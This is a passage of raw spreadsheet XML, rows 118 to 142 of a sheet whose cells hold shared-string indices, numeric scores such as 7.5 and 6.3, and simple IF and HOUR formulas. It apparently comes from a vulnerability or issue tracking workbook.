    <row r="118" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A118" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B118" s="4" t="s">
        <v>1038</v>
      </c>
      <c r="C118" s="4" t="s">
        <v>1039</v>
      </c>
      <c r="D118" s="4" t="s">
        <v>1040</v>
      </c>
      <c r="E118" s="4" t="s">
        <v>1041</v>
      </c>
      <c r="F118" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G118" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H118" s="4">
        <v>7.5</v>
      </c>
      <c r="I118" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J118" s="4"/>
      <c r="K118" s="4"/>
      <c r="L118" s="4">
        <f>IF(out!$G118="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M118" s="4"/>
      <c r="N118" s="4"/>
      <c r="O118" s="13"/>
      <c r="P118" s="4"/>
      <c r="Q118" s="13">
        <f>HOUR(out!$P118 -out!$N118)</f>
        <v>0</v>
      </c>
      <c r="R118" s="18"/>
      <c r="S118" s="4"/>
      <c r="T118" s="4"/>
      <c r="U118" s="4"/>
      <c r="V118" s="7"/>
    </row>
    <row r="119" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A119" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B119" s="4" t="s">
        <v>1042</v>
      </c>
      <c r="C119" s="4" t="s">
        <v>1043</v>
      </c>
      <c r="D119" s="4" t="s">
        <v>1044</v>
      </c>
      <c r="E119" s="4" t="s">
        <v>1045</v>
      </c>
      <c r="F119" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G119" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H119" s="4">
        <v>7.5</v>
      </c>
      <c r="I119" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J119" s="4"/>
      <c r="K119" s="4"/>
      <c r="L119" s="4">
        <f>IF(out!$G119="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M119" s="4"/>
      <c r="N119" s="4"/>
      <c r="O119" s="13"/>
      <c r="P119" s="4"/>
      <c r="Q119" s="13">
        <f>HOUR(out!$P119 -out!$N119)</f>
        <v>0</v>
      </c>
      <c r="R119" s="18"/>
      <c r="S119" s="4"/>
      <c r="T119" s="4"/>
      <c r="U119" s="4"/>
      <c r="V119" s="7"/>
    </row>
    <row r="120" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A120" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B120" s="4" t="s">
        <v>1046</v>
      </c>
      <c r="C120" s="4" t="s">
        <v>1047</v>
      </c>
      <c r="D120" s="4" t="s">
        <v>1048</v>
      </c>
      <c r="E120" s="4" t="s">
        <v>1049</v>
      </c>
      <c r="F120" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G120" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H120" s="4">
        <v>7.5</v>
      </c>
      <c r="I120" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J120" s="4"/>
      <c r="K120" s="4"/>
      <c r="L120" s="4">
        <f>IF(out!$G120="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M120" s="4"/>
      <c r="N120" s="4"/>
      <c r="O120" s="13"/>
      <c r="P120" s="4"/>
      <c r="Q120" s="13">
        <f>HOUR(out!$P120 -out!$N120)</f>
        <v>0</v>
      </c>
      <c r="R120" s="18"/>
      <c r="S120" s="4"/>
      <c r="T120" s="4"/>
      <c r="U120" s="4"/>
      <c r="V120" s="7"/>
    </row>
    <row r="121" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A121" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B121" s="4" t="s">
        <v>1050</v>
      </c>
      <c r="C121" s="4" t="s">
        <v>1051</v>
      </c>
      <c r="D121" s="4" t="s">
        <v>1052</v>
      </c>
      <c r="E121" s="4" t="s">
        <v>1053</v>
      </c>
      <c r="F121" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G121" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H121" s="4">
        <v>7.5</v>
      </c>
      <c r="I121" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J121" s="4"/>
      <c r="K121" s="4"/>
      <c r="L121" s="4">
        <f>IF(out!$G121="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M121" s="4"/>
      <c r="N121" s="4"/>
      <c r="O121" s="13"/>
      <c r="P121" s="4"/>
      <c r="Q121" s="13">
        <f>HOUR(out!$P121 -out!$N121)</f>
        <v>0</v>
      </c>
      <c r="R121" s="18"/>
      <c r="S121" s="4"/>
      <c r="T121" s="4"/>
      <c r="U121" s="4"/>
      <c r="V121" s="7"/>
    </row>
    <row r="122" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A122" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B122" s="4" t="s">
        <v>1054</v>
      </c>
      <c r="C122" s="4" t="s">
        <v>1055</v>
      </c>
      <c r="D122" s="4" t="s">
        <v>1056</v>
      </c>
      <c r="E122" s="4" t="s">
        <v>1057</v>
      </c>
      <c r="F122" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G122" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H122" s="4">
        <v>7.5</v>
      </c>
      <c r="I122" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J122" s="4"/>
      <c r="K122" s="4"/>
      <c r="L122" s="4">
        <f>IF(out!$G122="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M122" s="4"/>
      <c r="N122" s="4"/>
      <c r="O122" s="13"/>
      <c r="P122" s="4"/>
      <c r="Q122" s="13">
        <f>HOUR(out!$P122 -out!$N122)</f>
        <v>0</v>
      </c>
      <c r="R122" s="18"/>
      <c r="S122" s="4"/>
      <c r="T122" s="4"/>
      <c r="U122" s="4"/>
      <c r="V122" s="7"/>
    </row>
    <row r="123" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A123" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B123" s="4" t="s">
        <v>1058</v>
      </c>
      <c r="C123" s="4" t="s">
        <v>1059</v>
      </c>
      <c r="D123" s="4" t="s">
        <v>1060</v>
      </c>
      <c r="E123" s="4" t="s">
        <v>1061</v>
      </c>
      <c r="F123" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G123" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H123" s="4">
        <v>7.5</v>
      </c>
      <c r="I123" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J123" s="4"/>
      <c r="K123" s="4"/>
      <c r="L123" s="4">
        <f>IF(out!$G123="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M123" s="4"/>
      <c r="N123" s="4"/>
      <c r="O123" s="13"/>
      <c r="P123" s="4"/>
      <c r="Q123" s="13">
        <f>HOUR(out!$P123 -out!$N123)</f>
        <v>0</v>
      </c>
      <c r="R123" s="18"/>
      <c r="S123" s="4"/>
      <c r="T123" s="4"/>
      <c r="U123" s="4"/>
      <c r="V123" s="7"/>
    </row>
    <row r="124" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A124" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B124" s="4" t="s">
        <v>1062</v>
      </c>
      <c r="C124" s="4" t="s">
        <v>1063</v>
      </c>
      <c r="D124" s="4" t="s">
        <v>1064</v>
      </c>
      <c r="E124" s="4" t="s">
        <v>1065</v>
      </c>
      <c r="F124" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G124" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H124" s="4">
        <v>7.5</v>
      </c>
      <c r="I124" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J124" s="4"/>
      <c r="K124" s="4"/>
      <c r="L124" s="4">
        <f>IF(out!$G124="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M124" s="4"/>
      <c r="N124" s="4"/>
      <c r="O124" s="13"/>
      <c r="P124" s="4"/>
      <c r="Q124" s="13">
        <f>HOUR(out!$P124 -out!$N124)</f>
        <v>0</v>
      </c>
      <c r="R124" s="18"/>
      <c r="S124" s="4"/>
      <c r="T124" s="4"/>
      <c r="U124" s="4"/>
      <c r="V124" s="7"/>
    </row>
    <row r="125" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A125" s="3" t="s">
        <v>1066</v>
      </c>
      <c r="B125" s="4" t="s">
        <v>1067</v>
      </c>
      <c r="C125" s="4" t="s">
        <v>1068</v>
      </c>
      <c r="D125" s="4" t="s">
        <v>1069</v>
      </c>
      <c r="E125" s="4" t="s">
        <v>1070</v>
      </c>
      <c r="F125" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G125" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H125" s="4">
        <v>6.3</v>
      </c>
      <c r="I125" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J125" s="4"/>
      <c r="K125" s="4"/>
      <c r="L125" s="4">
        <f>IF(out!$G125="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M125" s="4"/>
      <c r="N125" s="4"/>
      <c r="O125" s="13"/>
      <c r="P125" s="4"/>
      <c r="Q125" s="13">
        <f>HOUR(out!$P125 -out!$N125)</f>
        <v>0</v>
      </c>
      <c r="R125" s="18"/>
      <c r="S125" s="4"/>
      <c r="T125" s="4"/>
      <c r="U125" s="4"/>
      <c r="V125" s="7"/>
    </row>
    <row r="126" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A126" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B126" s="4" t="s">
        <v>1072</v>
      </c>
      <c r="C126" s="4" t="s">
        <v>1073</v>
      </c>
      <c r="D126" s="4" t="s">
        <v>1074</v>
      </c>
      <c r="E126" s="4" t="s">
        <v>1075</v>
      </c>
      <c r="F126" s="4" t="s">
        <v>1076</v>
      </c>
      <c r="G126" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H126" s="4">
        <v>6.3</v>
      </c>
      <c r="I126" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J126" s="4"/>
      <c r="K126" s="4"/>
      <c r="L126" s="4">
        <f>IF(out!$G126="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M126" s="4"/>
      <c r="N126" s="4"/>
      <c r="O126" s="13"/>
      <c r="P126" s="4"/>
      <c r="Q126" s="13">
        <f>HOUR(out!$P126 -out!$N126)</f>
        <v>0</v>
      </c>
      <c r="R126" s="18"/>
      <c r="S126" s="4"/>
      <c r="T126" s="4"/>
      <c r="U126" s="4"/>
      <c r="V126" s="7"/>
    </row>
    <row r="127" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A127" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B127" s="4" t="s">
        <v>1077</v>
      </c>
      <c r="C127" s="4" t="s">
        <v>1078</v>
      </c>
      <c r="D127" s="4" t="s">
        <v>1079</v>
      </c>
      <c r="E127" s="4" t="s">
        <v>1080</v>
      </c>
      <c r="F127" s="4" t="s">
        <v>1076</v>
      </c>
      <c r="G127" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H127" s="4">
        <v>6.3</v>
      </c>
      <c r="I127" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J127" s="4"/>
      <c r="K127" s="4"/>
      <c r="L127" s="4">
        <f>IF(out!$G127="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M127" s="4"/>
      <c r="N127" s="4"/>
      <c r="O127" s="13"/>
      <c r="P127" s="4"/>
      <c r="Q127" s="13">
        <f>HOUR(out!$P127 -out!$N127)</f>
        <v>0</v>
      </c>
      <c r="R127" s="18"/>
      <c r="S127" s="4"/>
      <c r="T127" s="4"/>
      <c r="U127" s="4"/>
      <c r="V127" s="7"/>
    </row>
    <row r="128" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A128" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B128" s="4" t="s">
        <v>1081</v>
      </c>
      <c r="C128" s="4" t="s">
        <v>1082</v>
      </c>
      <c r="D128" s="4" t="s">
        <v>1083</v>
      </c>
      <c r="E128" s="4" t="s">
        <v>1084</v>
      </c>
      <c r="F128" s="4" t="s">
        <v>1076</v>
      </c>
      <c r="G128" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H128" s="4">
        <v>6.3</v>
      </c>
      <c r="I128" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J128" s="4"/>
      <c r="K128" s="4"/>
      <c r="L128" s="4">
        <f>IF(out!$G128="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M128" s="4"/>
      <c r="N128" s="4"/>
      <c r="O128" s="13"/>
      <c r="P128" s="4"/>
      <c r="Q128" s="13">
        <f>HOUR(out!$P128 -out!$N128)</f>
        <v>0</v>
      </c>
      <c r="R128" s="18"/>
      <c r="S128" s="4"/>
      <c r="T128" s="4"/>
      <c r="U128" s="4"/>
      <c r="V128" s="7"/>
    </row>
    <row r="129" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A129" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B129" s="4" t="s">
        <v>1085</v>
      </c>
      <c r="C129" s="4" t="s">
        <v>1086</v>
      </c>
      <c r="D129" s="4" t="s">
        <v>1087</v>
      </c>
      <c r="E129" s="4" t="s">
        <v>1088</v>
      </c>
      <c r="F129" s="4" t="s">
        <v>1076</v>
      </c>
      <c r="G129" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H129" s="4">
        <v>6.3</v>
      </c>
      <c r="I129" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J129" s="4"/>
      <c r="K129" s="4"/>
      <c r="L129" s="4">
        <f>IF(out!$G129="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M129" s="4"/>
      <c r="N129" s="4"/>
      <c r="O129" s="13"/>
      <c r="P129" s="4"/>
      <c r="Q129" s="13">
        <f>HOUR(out!$P129 -out!$N129)</f>
        <v>0</v>
      </c>
      <c r="R129" s="18"/>
      <c r="S129" s="4"/>
      <c r="T129" s="4"/>
      <c r="U129" s="4"/>
      <c r="V129" s="7"/>
    </row>
    <row r="130" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A130" s="3" t="s">
        <v>1071</v>
      </c>
      <c r="B130" s="4" t="s">
        <v>1089</v>
      </c>
      <c r="C130" s="4" t="s">
        <v>1090</v>
      </c>
      <c r="D130" s="4" t="s">
        <v>1091</v>
      </c>
      <c r="E130" s="4" t="s">
        <v>1092</v>
      </c>
      <c r="F130" s="4" t="s">
        <v>1076</v>
      </c>
      <c r="G130" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H130" s="4">
        <v>6.3</v>
      </c>
      <c r="I130" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J130" s="4"/>
      <c r="K130" s="4"/>
      <c r="L130" s="4">
        <f>IF(out!$G130="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M130" s="4"/>
      <c r="N130" s="4"/>
      <c r="O130" s="13"/>
      <c r="P130" s="4"/>
      <c r="Q130" s="13">
        <f>HOUR(out!$P130 -out!$N130)</f>
        <v>0</v>
      </c>
      <c r="R130" s="18"/>
      <c r="S130" s="4"/>
      <c r="T130" s="4"/>
      <c r="U130" s="4"/>
      <c r="V130" s="7"/>
    </row>
    <row r="131" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A131" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B131" s="4" t="s">
        <v>1093</v>
      </c>
      <c r="C131" s="4" t="s">
        <v>1094</v>
      </c>
      <c r="D131" s="4" t="s">
        <v>1095</v>
      </c>
      <c r="E131" s="4" t="s">
        <v>1096</v>
      </c>
      <c r="F131" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G131" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H131" s="4">
        <v>7.5</v>
      </c>
      <c r="I131" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J131" s="4"/>
      <c r="K131" s="4"/>
      <c r="L131" s="4">
        <f>IF(out!$G131="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M131" s="4"/>
      <c r="N131" s="4"/>
      <c r="O131" s="13"/>
      <c r="P131" s="4"/>
      <c r="Q131" s="13">
        <f>HOUR(out!$P131 -out!$N131)</f>
        <v>0</v>
      </c>
      <c r="R131" s="18"/>
      <c r="S131" s="4"/>
      <c r="T131" s="4"/>
      <c r="U131" s="4"/>
      <c r="V131" s="7"/>
    </row>
    <row r="132" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A132" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B132" s="4" t="s">
        <v>1097</v>
      </c>
      <c r="C132" s="4" t="s">
        <v>1098</v>
      </c>
      <c r="D132" s="4" t="s">
        <v>1099</v>
      </c>
      <c r="E132" s="4" t="s">
        <v>1100</v>
      </c>
      <c r="F132" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G132" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H132" s="4">
        <v>7.5</v>
      </c>
      <c r="I132" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J132" s="4"/>
      <c r="K132" s="4"/>
      <c r="L132" s="4">
        <f>IF(out!$G132="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M132" s="4"/>
      <c r="N132" s="4"/>
      <c r="O132" s="13"/>
      <c r="P132" s="4"/>
      <c r="Q132" s="13">
        <f>HOUR(out!$P132 -out!$N132)</f>
        <v>0</v>
      </c>
      <c r="R132" s="18"/>
      <c r="S132" s="4"/>
      <c r="T132" s="4"/>
      <c r="U132" s="4"/>
      <c r="V132" s="7"/>
    </row>
    <row r="133" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A133" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B133" s="4" t="s">
        <v>1101</v>
      </c>
      <c r="C133" s="4" t="s">
        <v>1102</v>
      </c>
      <c r="D133" s="4" t="s">
        <v>1103</v>
      </c>
      <c r="E133" s="4" t="s">
        <v>1104</v>
      </c>
      <c r="F133" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G133" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H133" s="4">
        <v>7.5</v>
      </c>
      <c r="I133" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J133" s="4"/>
      <c r="K133" s="4"/>
      <c r="L133" s="4">
        <f>IF(out!$G133="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M133" s="4"/>
      <c r="N133" s="4"/>
      <c r="O133" s="13"/>
      <c r="P133" s="4"/>
      <c r="Q133" s="13">
        <f>HOUR(out!$P133 -out!$N133)</f>
        <v>0</v>
      </c>
      <c r="R133" s="18"/>
      <c r="S133" s="4"/>
      <c r="T133" s="4"/>
      <c r="U133" s="4"/>
      <c r="V133" s="7"/>
    </row>
    <row r="134" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A134" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B134" s="4" t="s">
        <v>1105</v>
      </c>
      <c r="C134" s="4" t="s">
        <v>1106</v>
      </c>
      <c r="D134" s="4" t="s">
        <v>1107</v>
      </c>
      <c r="E134" s="4" t="s">
        <v>1108</v>
      </c>
      <c r="F134" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G134" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H134" s="4">
        <v>5.3</v>
      </c>
      <c r="I134" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J134" s="4"/>
      <c r="K134" s="4"/>
      <c r="L134" s="4">
        <f>IF(out!$G134="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M134" s="4"/>
      <c r="N134" s="4"/>
      <c r="O134" s="13"/>
      <c r="P134" s="4"/>
      <c r="Q134" s="13">
        <f>HOUR(out!$P134 -out!$N134)</f>
        <v>0</v>
      </c>
      <c r="R134" s="18"/>
      <c r="S134" s="4"/>
      <c r="T134" s="4"/>
      <c r="U134" s="4"/>
      <c r="V134" s="7"/>
    </row>
    <row r="135" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A135" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B135" s="4" t="s">
        <v>1109</v>
      </c>
      <c r="C135" s="4" t="s">
        <v>1110</v>
      </c>
      <c r="D135" s="4" t="s">
        <v>1111</v>
      </c>
      <c r="E135" s="4" t="s">
        <v>1112</v>
      </c>
      <c r="F135" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G135" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H135" s="4">
        <v>7.5</v>
      </c>
      <c r="I135" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J135" s="4"/>
      <c r="K135" s="4"/>
      <c r="L135" s="4">
        <f>IF(out!$G135="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M135" s="4"/>
      <c r="N135" s="4"/>
      <c r="O135" s="13"/>
      <c r="P135" s="4"/>
      <c r="Q135" s="13">
        <f>HOUR(out!$P135 -out!$N135)</f>
        <v>0</v>
      </c>
      <c r="R135" s="18"/>
      <c r="S135" s="4"/>
      <c r="T135" s="4"/>
      <c r="U135" s="4"/>
      <c r="V135" s="7"/>
    </row>
    <row r="136" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A136" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B136" s="4" t="s">
        <v>1113</v>
      </c>
      <c r="C136" s="4" t="s">
        <v>1114</v>
      </c>
      <c r="D136" s="4" t="s">
        <v>1115</v>
      </c>
      <c r="E136" s="4" t="s">
        <v>1116</v>
      </c>
      <c r="F136" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G136" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H136" s="4">
        <v>7.5</v>
      </c>
      <c r="I136" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J136" s="4"/>
      <c r="K136" s="4"/>
      <c r="L136" s="4">
        <f>IF(out!$G136="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M136" s="4"/>
      <c r="N136" s="4"/>
      <c r="O136" s="13"/>
      <c r="P136" s="4"/>
      <c r="Q136" s="13">
        <f>HOUR(out!$P136 -out!$N136)</f>
        <v>0</v>
      </c>
      <c r="R136" s="18"/>
      <c r="S136" s="4"/>
      <c r="T136" s="4"/>
      <c r="U136" s="4"/>
      <c r="V136" s="7"/>
    </row>
    <row r="137" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A137" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B137" s="4" t="s">
        <v>1117</v>
      </c>
      <c r="C137" s="4" t="s">
        <v>1118</v>
      </c>
      <c r="D137" s="4" t="s">
        <v>1119</v>
      </c>
      <c r="E137" s="4" t="s">
        <v>1120</v>
      </c>
      <c r="F137" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G137" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H137" s="4">
        <v>7.5</v>
      </c>
      <c r="I137" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J137" s="4"/>
      <c r="K137" s="4"/>
      <c r="L137" s="4">
        <f>IF(out!$G137="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M137" s="4"/>
      <c r="N137" s="4"/>
      <c r="O137" s="13"/>
      <c r="P137" s="4"/>
      <c r="Q137" s="13">
        <f>HOUR(out!$P137 -out!$N137)</f>
        <v>0</v>
      </c>
      <c r="R137" s="18"/>
      <c r="S137" s="4"/>
      <c r="T137" s="4"/>
      <c r="U137" s="4"/>
      <c r="V137" s="7"/>
    </row>
    <row r="138" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A138" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B138" s="4" t="s">
        <v>1121</v>
      </c>
      <c r="C138" s="4" t="s">
        <v>1122</v>
      </c>
      <c r="D138" s="4" t="s">
        <v>1123</v>
      </c>
      <c r="E138" s="4" t="s">
        <v>1124</v>
      </c>
      <c r="F138" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G138" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H138" s="4">
        <v>7.5</v>
      </c>
      <c r="I138" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J138" s="4"/>
      <c r="K138" s="4"/>
      <c r="L138" s="4">
        <f>IF(out!$G138="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M138" s="4"/>
      <c r="N138" s="4"/>
      <c r="O138" s="13"/>
      <c r="P138" s="4"/>
      <c r="Q138" s="13">
        <f>HOUR(out!$P138 -out!$N138)</f>
        <v>0</v>
      </c>
      <c r="R138" s="18"/>
      <c r="S138" s="4"/>
      <c r="T138" s="4"/>
      <c r="U138" s="4"/>
      <c r="V138" s="7"/>
    </row>
    <row r="139" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A139" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B139" s="4" t="s">
        <v>1125</v>
      </c>
      <c r="C139" s="4" t="s">
        <v>1126</v>
      </c>
      <c r="D139" s="4" t="s">
        <v>1127</v>
      </c>
      <c r="E139" s="4" t="s">
        <v>1128</v>
      </c>
      <c r="F139" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G139" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H139" s="4">
        <v>7.5</v>
      </c>
      <c r="I139" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J139" s="4"/>
      <c r="K139" s="4"/>
      <c r="L139" s="4">
        <f>IF(out!$G139="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M139" s="4"/>
      <c r="N139" s="4"/>
      <c r="O139" s="13"/>
      <c r="P139" s="4"/>
      <c r="Q139" s="13">
        <f>HOUR(out!$P139 -out!$N139)</f>
        <v>0</v>
      </c>
      <c r="R139" s="18"/>
      <c r="S139" s="4"/>
      <c r="T139" s="4"/>
      <c r="U139" s="4"/>
      <c r="V139" s="7"/>
    </row>
    <row r="140" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A140" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B140" s="4" t="s">
        <v>1129</v>
      </c>
      <c r="C140" s="4" t="s">
        <v>1130</v>
      </c>
      <c r="D140" s="4" t="s">
        <v>1131</v>
      </c>
      <c r="E140" s="4" t="s">
        <v>1132</v>
      </c>
      <c r="F140" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G140" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H140" s="4">
        <v>7.5</v>
      </c>
      <c r="I140" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J140" s="4"/>
      <c r="K140" s="4"/>
      <c r="L140" s="4">
        <f>IF(out!$G140="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M140" s="4"/>
      <c r="N140" s="4"/>
      <c r="O140" s="13"/>
      <c r="P140" s="4"/>
      <c r="Q140" s="13">
        <f>HOUR(out!$P140 -out!$N140)</f>
        <v>0</v>
      </c>
      <c r="R140" s="18"/>
      <c r="S140" s="4"/>
      <c r="T140" s="4"/>
      <c r="U140" s="4"/>
      <c r="V140" s="7"/>
    </row>
    <row r="141" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A141" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B141" s="4" t="s">
        <v>1133</v>
      </c>
      <c r="C141" s="4" t="s">
        <v>1134</v>
      </c>
      <c r="D141" s="4" t="s">
        <v>1135</v>
      </c>
      <c r="E141" s="4" t="s">
        <v>1136</v>
      </c>
      <c r="F141" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G141" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H141" s="4">
        <v>7.5</v>
      </c>
      <c r="I141" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J141" s="4"/>
      <c r="K141" s="4"/>
      <c r="L141" s="4">
        <f>IF(out!$G141="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M141" s="4"/>
      <c r="N141" s="4"/>
      <c r="O141" s="13"/>
      <c r="P141" s="4"/>
      <c r="Q141" s="13">
        <f>HOUR(out!$P141 -out!$N141)</f>
        <v>0</v>
      </c>
      <c r="R141" s="18"/>
      <c r="S141" s="4"/>
      <c r="T141" s="4"/>
      <c r="U141" s="4"/>
      <c r="V141" s="7"/>
    </row>
    <row r="142" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A142" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B142" s="4" t="s">
        <v>1137</v>
      </c>
      <c r="C142" s="4" t="s">
        <v>1138</v>
      </c>
      <c r="D142" s="4" t="s">
        <v>1139</v>
      </c>
      <c r="E142" s="4" t="s">
        <v>1140</v>
      </c>
      <c r="F142" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G142" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H142" s="4">
        <v>7.5</v>
      </c>
      <c r="I142" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J142" s="4"/>
      <c r="K142" s="4"/>
      <c r="L142" s="4">
        <f>IF(out!$G142="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M142" s="4"/>
      <c r="N142" s="4"/>
      <c r="O142" s="13"/>
      <c r="P142" s="4"/>
      <c r="Q142" s="13">
        <f>HOUR(out!$P142 -out!$N142)</f>
        <v>0</v>
      </c>
      <c r="R142" s="18"/>
      <c r="S142" s="4"/>
      <c r="T142" s="4"/>
      <c r="U142" s="4"/>
      <c r="V142" s="7"/>
    </row>
    <row r="143" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A143" s="3" t="s">
